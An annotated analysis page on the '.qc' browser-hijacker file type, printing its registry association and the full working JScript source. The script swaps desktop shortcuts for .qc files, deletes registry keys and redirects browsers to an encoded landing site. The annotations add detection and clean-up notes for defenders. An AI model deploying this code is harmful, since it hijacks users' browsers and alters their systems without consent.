.qc


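.qc,疑似瀏覽器劫持軟體所使用的附檔名。依下方指令碼所示,它會把桌面與快速啟動列上指向 .exe 的 .lnk 捷徑改寫成 .qc 檔並刪除原捷徑;開啟 .qc 檔時由 WScript 執行 WinRAR.knl,若目標是瀏覽器,則改以指令碼內編碼的網址啟動。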

相關

登錄資訊

Windows Registry Editor Version 5.00
 
; Maps the .qc extension to the qcfile ProgID defined below.
[HKEY_CLASSES_ROOT\.qc]
@="qcfile"
 
; Display name of the file type (the string is mis-encoded on this page;
; presumably the Simplified Chinese word for "shortcut" - verify).
; NeverShowExt keeps Explorer from displaying the .qc extension, so these
; files are presented without a visible extension.
[HKEY_CLASSES_ROOT\qcfile]
@="辦豎源宒"
"NeverShowExt"=""
 
; NOTE(review): the same CLSID is reused under shell\open and IconHandler;
; it appears to be the shell's Internet Shortcut class, which would fit the
; [InternetShortcut]/IconFile lines the script writes into .qc files - confirm.
[HKEY_CLASSES_ROOT\qcfile\CLSID]
@="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
 
; REG_EXPAND_SZ (UTF-16LE) that decodes to %SystemRoot%\system32\url.dll,0
[HKEY_CLASSES_ROOT\qcfile\DefaultIcon]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,75,00,72,00,\
  6c,00,2e,00,64,00,6c,00,6c,00,2c,00,30,00,00,00
 
[HKEY_CLASSES_ROOT\qcfile\shell]
@="open"
 
[HKEY_CLASSES_ROOT\qcfile\shell\open]
"CLSID"="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
 
; Security-relevant key: opening any .qc file starts WScript.exe on winrar.knl
; with the .qc path as %1. A wscript.exe process whose script argument is a
; .knl file under a WinRAR folder is a usable detection signal.
; NOTE(review): no //E: engine switch is present, so how the .knl extension is
; bound to a script engine is not shown on this page.
[HKEY_CLASSES_ROOT\qcfile\shell\open\command]
@="WScript.exe \"C:\\Program Files\\WinRAR\\winrar.knl\" \"%1\""
 
[HKEY_CLASSES_ROOT\qcfile\shellex]
 
[HKEY_CLASSES_ROOT\qcfile\shellex\ContextMenuHandlers]
@=""
 
[HKEY_CLASSES_ROOT\qcfile\shellex\IconHandler]
@="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"

C:\Program Files\WinRAR\WinRAR.knl

(function() {
    // Script-wide state. P and q are filled in by E() with WScript.Shell and
    // Scripting.FileSystemObject instances.
    var P, q;
    // XOR key applied by t() to every "^"-separated number in A, c and M.
    var k = 15;
    // The hijacked extension and the ProgID that I() registers it under.
    var z = ".qc";
    var o = "qcfile";
    // D: Internet Explorer path returned by n(); C: Desktop\NameSpace subkey
    // names returned by d().
    var D;
    var C;
    // Encoded upper-case browser image names. XOR 15 yields IEXPLOR.EXE,
    // MAXTHON.EXE, THEWORLD.EXE, IEXPLORE.EXE, 360SE.EXE, TTRAVELER.EXE and
    // FIREFOX.EXE; m() uses the decoded list to decide whether a shortcut
    // target is a browser.
    var A = ["70^74^87^95^67^64^93^33^74^87^74","66^78^87^91^71^64^65^33^74^87^74", "91^71^74^88^64^93^67^75^33^74^87^74", "70^74^87^95^67^64^93^74^33^74^87^74", "60^57^63^92^74^33^74^87^74", "91^91^93^78^89^74^67^74^93^33^74^87^74", "73^70^93^74^73^64^87^33^74^87^74"];
    // G: Quick Launch folder returned by s(). J and N are never assigned in
    // this listing.
    var G;
    var J;
    var N;
    // O: System32 path, b: Program Files path, g: b + "\WinRAR\" (set in E()).
    var O;
    var b;
    var g;
// Encoded landing host list. XOR 15 yields www.pp2345[.]com (defanged here);
// a() builds the URL handed to a browser from one of these entries.
var c = ["120^120^120^33^127^127^61^60^59^58^33^108^96^98"];
// Encoded landing URL: "http://" followed by the same host. E() decodes it,
// but the only reference afterwards is the commented-out line inside y().
var M = "103^123^123^127^53^32^32^120^120^120^33^127^127^61^60^59^58^33^108^96^98";
    // String de-obfuscator: splits R on "^", XORs each number with the key k
    // and joins the resulting characters. Applying it offline to A, c and M
    // recovers the browser names and landing host without running the sample.
    var t = function(R) {
        var T = R.split("^");
        for (var S in T) {
            // T[S] is a numeric string; the ^ operator coerces it to a number.
            T[S] = T[S] ^ k;
            T[S] = String.fromCharCode(T[S])
        }
        return T.join("")
    };
    // Decodes every entry of A (browser image names) and c (landing hosts)
    // in place with t(). Called once from E().
    var L = function() {
        for (var R in A) {
            A[R] = t(A[R])
        }
        for (var S in c) {
            c[S] = t(c[S])
        }
    };
    // Lists the subkey names of HKLM\...\Explorer\Desktop\NameSpace through
    // the WMI StdRegProv provider (EnumKey). Returns an array of names, or []
    // when any step throws.
    var d = function() {
        // 2147483650 == 0x80000002, the StdRegProv constant for HKEY_LOCAL_MACHINE.
        var S = 2147483650;
        // sRegPath and the o* names below are assigned without var, so they
        // become implicit globals of the script host.
        sRegPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace";
        try {
            oLoc = new ActiveXObject("WbemScripting.SWbemLocator");
            oSvc = oLoc.ConnectServer(null, "root\\default");
            oReg = oSvc.Get("StdRegProv");
            oMethod = oReg.Methods_.Item("EnumKey");
            oInParam = oMethod.InParameters.SpawnInstance_();
            oInParam.hDefKey = S;
            oInParam.sSubKeyName = sRegPath;
            oOutParam = oReg.ExecMethod_(oMethod.Name, oInParam);
            return oOutParam.sNames.toArray()
        } catch(R) {
            return []
        }
    };
    // Linear membership test: true when some element of array R loosely
    // equals (==) T, false otherwise.
    var K = function(R, T) {
        for (var S = 0; S < R.length; S++) {
            if (R[S] == T) {
                return true
            }
        }
        return false
    };
    // Prunes the desktop namespace: every subkey of
    // HKLM\...\Explorer\Desktop\NameSpace that is not one of the four CLSIDs
    // in R is deleted with RegDelete. The allow-list includes the Recycle Bin
    // ({645FF040-...}) and My Documents ({450D8FBA-...}) entries.
    // Defender note: the deleted keys are not saved anywhere by this script,
    // so recovery needs a registry backup or a reference system; bulk
    // deletions under this key are a usable detection signal.
    var h = function() {
        C = d();
        try {
            var S;
            var R = ["{1f4de370-d627-11d1-ba4f-00a0c91eedba}", "{450D8FBA-AD25-11D0-98A8-0800361B1103}", "{645FF040-5081-101B-9F08-00AA002F954E}", "{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"];
            // Both lists are upper-cased so the comparison in K() is
            // effectively case-insensitive.
            for (S = 0; S < R.length; S++) {
                R[S] = R[S].toUpperCase()
            }
            for (S = 0; S < C.length; S++) {
                C[S] = C[S].toUpperCase()
            }
            for (S = 0; S < C.length; S++) {
                if (!K(R, C[S])) {
                    P.RegDelete("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\" + C[S] + "\\")
                }
            }
        // The first failing RegDelete aborts the loop; the error is discarded.
        } catch(T) {}
    };
    // Writes four per-user (HKCU) Explorer values, each in its own try block
    // so one failure does not stop the rest. These are indicators to check
    // and reset during clean-up:
    //   Policies\Explorer\NoInternetIcon = 1 (REG_DWORD)
    //   Explorer\StartPage\Favorites = 255 (REG_BINARY)
    //   Explorer\HideDesktopIcons\ClassicStartMenu = 1 (REG_DWORD)
    //   Explorer\HideDesktopIcons\NewStartPanel\{871C5380-...} = 1 (REG_DWORD)
    // NOTE(review): NoInternetIcon and the {871C5380-...} entry look like the
    // settings that hide the built-in Internet Explorer desktop icon - confirm.
    var F = function() {
        try {
            P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", 1, "REG_DWORD")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartPage\\Favorites", 255, "REG_BINARY")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu", 1, "REG_DWORD")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}", 1, "REG_DWORD")
        } catch(R) {}
    };
 
    // Builds the current user's Quick Launch folder path from the USERPROFILE
    // process environment variable. Returns "" if the lookup throws.
    var s = function() {
        try {
            var U = P.Environment("PROCESS");
            var T = U("USERPROFILE");
            var R = T + "\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch";
            return R
        } catch(S) {
            return ""
        }
    };
    // True when the script was started without command-line arguments. The
    // main section uses this to tell a bare launch (install path) from a
    // launch that carries a file path argument.
    var p = function() {
        var R = WScript.Arguments;
        if (R.length == 0) {
            return true
        } else {
            return false
        }
    };
    // Browser check: upper-cases the path T and returns true when it contains
    // one of the decoded image names in A. The test is indexOf(...) > 0, so a
    // match at position 0 (a bare file name with no directory) is not counted.
    var m = function(T) {
        var U = T.toUpperCase();
        for (var R in A) {
            if (U.indexOf(A[R]) > 0) {
                return true
            }
        }
        return false
    };
    // Reads ProgramFilesDir from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
    // and falls back to "C:\Program Files" if the read throws. Nothing in
    // this listing calls u().
    var u = function() {
        try {
            var R = P.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir");
            return R
        } catch(S) {
            return "C:\\Program Files"
        }
    };
    // Returns the upper-cased full paths of the files directly inside folder
    // Y whose name ends with W (compared upper-cased). Returns [] if the
    // folder cannot be enumerated.
    var f = function(Y, W) {
        try {
            var U, S, R, ab;
            var X = new Array;
            var T = W;
            U = q.GetFolder(Y);
            R = new Enumerator(U.files);
            ab = "";
            T = W.toUpperCase();
            for (; ! R.atEnd(); R.moveNext()) {
                var aa = R.item();
                var Z = "";
                // Concatenating with "" turns the File object into its path string.
                Z += aa;
                Z = Z.toUpperCase();
                // T is used as a regular-expression source, so the "." in an
                // extension such as ".LNK" matches any character.
                if ((Z.match(T + "$") == T)) {
                    X[X.length] = Z
                }
            }
            return X
        } catch(V) {
            return []
        }
    };
    // Terminates every Win32_Process whose name equals S through WMI
    // (root\cimv2), then sleeps for one second. The WQL text is built by
    // concatenating S into the query. The only call in this listing passes
    // an empty name, H("").
    var H = function(S) {
        var R = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
        var U = R.ExecQuery('Select * From Win32_Process WHERE name="' + S + '"');
        var T = new Enumerator(U);
        while (!T.atEnd()) {
            T.item().Terminate();
            T.moveNext()
        }
        WScript.Sleep(1000)
    };
    // Writes the replacement "shortcut" file T (overwriting any existing
    // file) in an INI-like layout:
    //   Name=___<escape(V)>___  original target path
    //   Tel=<<<<escape(S)>>>>   original arguments
    //   IconFile=R              file whose icon is shown
    // a() later parses the ___...___ and <<<...>>> markers to launch the
    // target. Defender note: because the original target and arguments are
    // kept in these two fields, they can be read back from each .qc file when
    // rebuilding the deleted .lnk shortcuts.
    var r = function(T, V, S, R) {
        try {
            var U = q.CreateTextFile(T, true);
            U.WriteLine("[360]");
            U.WriteLine("Sex=擭");
            U.WriteLine("Name=___" + escape(V) + "___");
            U.WriteLine("Tel=<<<" + escape(S) + ">>>");
            U.WriteLine("[InternetShortcut]");
            U.WriteLine("URL=http://www.baidu.com");
            U.WriteLine("IconIndex=0");
            U.WriteLine("IconFile=" + R);
            U.Close()
        } catch(W) {}
    };
    // Registers the hijacked file type under HKEY_CLASSES_ROOT: z (".qc") is
    // pointed at ProgID o ("qcfile"), whose open command runs WScript.exe on
    // g + "winrar.knl" with the opened file as "%1". NeverShowExt keeps
    // Explorer from showing the extension. All writes share one try block, so
    // the first failure silently skips the remaining values.
    // Clean-up means removing HKCR\.qc and HKCR\qcfile.
    var I = function() {
        try {
            P.RegWrite("HKCR\\" + z + "\\", o, "REG_SZ");
            // Display name; the literal is mis-encoded on this page
            // (presumably the Simplified Chinese word for "shortcut" - verify).
            P.RegWrite("HKCR\\" + o + "\\", "辦豎源宒", "REG_SZ");
            //P.RegWrite("HKCR\\" + o + "\\IsShortcut", "", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\NeverShowExt", "", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\DefaultIcon\\", "%SystemRoot%\\system32\\url.dll,0", "REG_EXPAND_SZ");
            P.RegWrite("HKCR\\" + o + "\\CLSID\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\", "open", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\open\\CLSID", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\open\\command\\", 'WScript.exe "' + g + 'winrar.knl" "%1"', "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shellex\\IconHandler\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shellex\\ContextMenuHandlers\\", "", "REG_SZ")
        } catch(R) {}
    };
    // Copies file S to R and discards any error. Nothing in this listing
    // calls v().
    var v = function(S, R) {
        try {
            q.CopyFile(S, R)
        } catch(T) {}
    };
    // Returns the path used for Internet Explorer. It reads the
    // StartMenuInternet open command for IEXPLORE.EXE and strips quotes, with
    // "C:\Program Files\Internet Explorer\iexplore.exe" as the fallback.
    // NOTE(review): ParseFullPath and src are not defined anywhere in this
    // listing, so that call would throw and the catch branch would return the
    // hard-coded path every time - confirm against the full sample.
    var n = function() {
        try {
            var R = P.RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command\\");
            R = ParseFullPath(src);
            R = R.replace(/"/g, "")
        } catch(S) {
            return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
        }
        if (R == "") {
            return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
        }
        return R
    };
    // Initialisation: creates the WScript.Shell (P) and FileSystemObject (q)
    // helpers, decodes M, A and c, resolves the paths kept in O, b, g, G and
    // D, and creates the <ProgramFiles>\WinRAR\ folder if it is missing.
    var E = function() {
        P = new ActiveXObject("WScript.Shell");
        q = new ActiveXObject("Scripting.FileSystemObject");
        M = t(M);
        L();
        var S = P.Environment("PROCESS");
        O = S("SystemRoot") + "\\System32";
        b = S("ProgramFiles");
        // g is the folder named in the qcfile open command written by I().
        g = b + "\\WinRAR\\";
        G = s();
        D = n();
        // CreateFolder throws when the folder already exists; that is ignored.
        try {
            q.CreateFolder(g)
        } catch(R) {}
    };
    // Open handler for a .qc file V: reads the file, recovers the original
    // target (between ___ markers) and arguments (between <<< >>> markers) as
    // written by r(), and launches the target.
    // This is where the hijack happens: when m() reports the target is a
    // browser, the stored arguments are replaced by "http://<entry of c>/", so
    // the browser opens the landing page. For any other target the program is
    // started with no arguments at all; the stored arguments are not passed on.
    var a = function(V) {
        var Y = q.OpenTextFile(V, 1);
        var X = Y.ReadAll();
        var U = /___(.*?)___/ig;
        var S = /<<<(.*?)>>>/ig;
        var T, R;
        if (U.test(X)) {
            T = RegExp.$1;
            T = unescape(T)
        }
        if (S.test(X)) {
            R = RegExp.$1;
            R = unescape(R)
        }
        // If the ___ markers were not found T is still undefined here; the
        // comparison below is then true and m(T) is called on undefined.
        if (T != "") {
            if (m(T)) {
                // Random pick from the decoded host list c.
                var W = "http://" + c[parseInt(Math.random() * c.length)] + "/";
                R = W;
                if (R != "") {
                    R = '"' + R + '"'
                }
                P.Run('"' + T + '" ' + R, 1, false)
            } else {
                P.Run('"' + T + '" ', 1, false)
            }
        }
    };
    // Deletes file R after resetting its attributes to 32 (archive only),
    // which clears read-only, hidden and system flags first. Errors are
    // discarded.
    var l = function(R) {
        try {
            var S = q.GetFile(R);
            S.attributes = 32;
            q.DeleteFile(R)
        } catch(T) {}
    };
    // Shortcut replacement for one folder Y: for every .LNK file found by f(),
    // resolves its target and arguments, and if the target ends in ".exe"
    // writes "<base name>.qc" next to it via r() and deletes the original
    // .lnk via l(). Shortcuts are left alone when the target is empty,
    // contains "system32", or matches the SogouExplorer.exe / HaoZip.exe
    // patterns. Each shortcut is handled in its own try block.
    // Defender note: a folder where .lnk files have disappeared and same-named
    // .qc files have appeared is the on-disk trace of this routine.
    var e = function(Y) {
        var T = f(Y, ".LNK");
        for (var S in T) {
            try {
                var W = T[S];
                var V;
                var aa = "";
                var U = "";
                var R = "";
                var ad = "";
                var ab = /\.exe$/ig;
                var Z = /system32/ig;
                // In these two patterns "\S" is the non-whitespace class and
                // "\H" is a plain "H"; the unescaped "." matches any character.
                var Sogou = /\SogouExplorer.exe$/ig;
                var HaoZip = /\HaoZip.exe$/ig;
                R = q.GetBaseName(W);
                // CreateShortcut on an existing .lnk path loads it for reading.
                V = P.CreateShortcut(W);
                aa = V.TargetPath;
                U = V.Arguments;
                if (aa == "") {
                    continue
                }
                if (Z.test(aa)) {
                    continue
                } else {}
                if (Sogou.test(aa)) {
                    continue
                }
                if (HaoZip.test(aa)) {
                    continue
                }
                if (ab.test(aa)) {
                    ad = Y + "\\" + R + z;
                    // The target doubles as the icon source (4th argument).
                    r(ad, aa, U, aa);
                    l(W)
                } else {}
            } catch(X) {}
        }
    };
    // Writes a .qc file named "Internet Explerer" (spelling as in the sample)
    // on the all-users desktop, pointing at the IE path D with D as its icon,
    // then deletes the path Z.
    // NOTE(review): R and Z differ only in letter case, so on a
    // case-insensitive volume l(Z) would remove the file r() has just written
    // - confirm on a test system.
    var w = function() {
        try {
            var T = P.SpecialFolders("AllUsersDesktop");
            var R = T + "\\Internet Explerer" + z;
            var Z = T + "\\INTERNET EXPLERER" + z;
            r(R, D, "", D)     
            l(Z)         
        } catch(S) {}
    };
    // No-op in this listing: the only statement, which would have started
    // iexplore.exe with the decoded URL M, is commented out.
    var y = function() {
        //P.Run("iexplore.exe " + M)
    };
    // Entry point. E() always runs first to set up the helpers and paths.
    E();
    if (p()) {
        // Started with no arguments: install path. Registers the .qc file
        // type, applies the Explorer settings, prunes the desktop namespace
        // and replaces shortcuts on the all-users desktop, the user's desktop
        // and Quick Launch.
        I();
        // Empty process name; see H().
        H("");
        F();
        w();
        h();
        e(P.SpecialFolders("AllUsersDesktop"));
        e(P.SpecialFolders("Desktop"));
       // B(G);
        e(G);
        y()
    } else {
        // Started with an argument, as the qcfile open command does with
        // "%1": launch the program recorded in that .qc file, then re-apply
        // the settings and shortcut replacement. The association is not
        // re-registered on this path (I() is not called).
        var x = WScript.Arguments;
        a(x(0));
        F();
        w();
        h();
        e(P.SpecialFolders("AllUsersDesktop"));
        e(P.SpecialFolders("Desktop"));
      //  B(G);
        e(G)
    }
})();